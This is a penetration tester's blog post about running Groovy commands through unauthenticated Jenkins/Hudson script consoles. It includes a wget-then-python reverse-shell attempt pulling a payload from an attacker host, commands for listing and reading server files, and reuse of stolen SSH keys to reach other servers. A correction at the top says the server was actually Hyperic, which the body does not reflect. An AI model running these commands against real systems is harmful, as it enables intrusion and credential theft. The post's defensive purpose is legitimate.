Security, Programming, Pentesting
by averagesecurityguy
The original post said that I had gained unauthenticated access to a Hudson server. In fact, I had gained access to a VMware Hyperic server using the default credentials of hqadmin/hqadmin. Hudson is probably vulnerable as well but I do not know. If you can confirm the problem exists in Hudson as well, let me know in the comments.
On penetration tests it is my habit to find web servers and see what I can access using either default credentials or, in some cases, no credentials. On my last two penetration tests I gained unauthenticated access to project management servers; one was Hudson and the other Jenkins. Both of these project management systems include a web-based console that allows you to execute Groovy code. After a little research, I found that Groovy allows you to run system commands using the syntax ["command", "arg1", "arg2"].execute(). The output of the command can be accessed using println.
With both servers I attempted to get a reverse shell by using the following commands:
    ["wget", "http://192.168.1.1/shell.py", "-O", "/tmp/shell.py"].execute()
    ["python", "/tmp/shell.py"].execute()
This did not work on either server. I then used pentestmonkey's list of reverse shell one-liners to attempt to get a reverse shell working with ruby, bash, and perl. Again, nothing worked. Since I couldn't get a shell going, I decided to look around the server to see what data was available. I used the following commands:

    # To list files
    proc = ["ls", "-al", "/path/to/list"].execute()
    println proc.in.text

    # To cat a file
    proc = ["cat", "/file/to/cat"].execute()
    println proc.in.text
On the Jenkins server, I was able to access the .ssh folder of the jenkins user. This server contained private RSA keys, which I was able to feed into the Metasploit auxiliary module auxiliary/ssh/ssh_login_pubkey and gain access to three other servers.
If you are using a project management server such as Hudson or Jenkins, ensure that all unauthenticated access to the server is disabled. If you are a Penetration Tester, always check the web servers running on the client's networks; you never know what you will find. You can use my low-hanging fruit script to find active web servers.
tags: groovy - penetration testing - Pentesting